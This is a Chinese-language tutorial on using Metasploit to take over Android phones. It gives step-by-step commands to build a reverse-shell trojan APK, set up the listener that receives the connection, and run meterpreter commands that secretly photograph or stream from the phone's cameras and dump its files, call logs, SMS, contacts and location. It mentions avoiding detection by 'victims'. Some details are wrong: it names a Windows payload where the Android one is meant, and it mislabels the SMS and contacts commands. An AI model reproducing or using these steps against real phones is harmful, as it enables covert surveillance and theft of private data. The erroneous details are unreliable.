Metasploit之滲透安卓實戰
Metasploit之滲透安卓實戰
在之前的Metaspoloit使用中都是在Windows系統中,因為滲透的是Windows系統,所以選用了“windows/meterpreter/reverse_tcp”模組。
而這裡需要滲透安卓系統了,就選用“android/meterpreter/reverse_tcp”模組。
那麼對於kali-linux連線木馬的方式還是和之前的一樣,利用“exploit/multi/handler”
並且,同樣需要選用“windows/meterpreter/reverse_tcp”的PAYLOAD
這裡假設我的測試環境
kali-linux: 192.168.2.146
安卓模擬環境:192.168.2.107
一、生成遠端安卓木馬
msfconsole
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk
命令解析:
p 設定要使用的payload
LHOST 設定用來接收反彈連線的主機(kali-linux的IP)
LPORT 設定用來接收反彈連線的埠(kali-linux的埠)
R 設定檔案格式
Location 要儲存的檔案位置-->/root/Desktop/是桌面,沒有目錄表示當前系統Home目錄下
PS:對於目前的安卓系統安全機制的考慮,因為沒有簽名證書可能導致無法安裝或易被受害者識破
那麼,簽名證書的製作可以檢視參考文獻資料
二、開啟metasploit,並且開啟相關連線
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.146
set LPORT 4444
exploit
三、meterpreter連線
安卓手機安裝並且開啟木馬後會返回我們一個meterpreter連線,那麼我們可以使用以下的一些常用的命令:
cd -->目錄切換,命令:cd / 切換到根目錄
search -->搜尋檔案,命令:search text.jpg
download -->下載檔案,命令:download test.jpg
webcam_list -->檢視攝像頭列表,因為手機都是前置和後置攝像頭了
webcam_snap -->拍照一張,需要選用前置或者後置攝像頭,命令:webcam_snap -i 1
webcam_stream -->開啟攝像頭視訊監控,同上,命令:webcam_stream -i 1
安卓系統相關命令:
check_root -->檢視當前安卓是否已經root
dump_calllog -->下載通話記錄
dump_contacts -->下載簡訊記錄
dump_sms -->下載通訊錄
geolocate -->利用谷歌地圖定位(需要安裝谷歌地圖)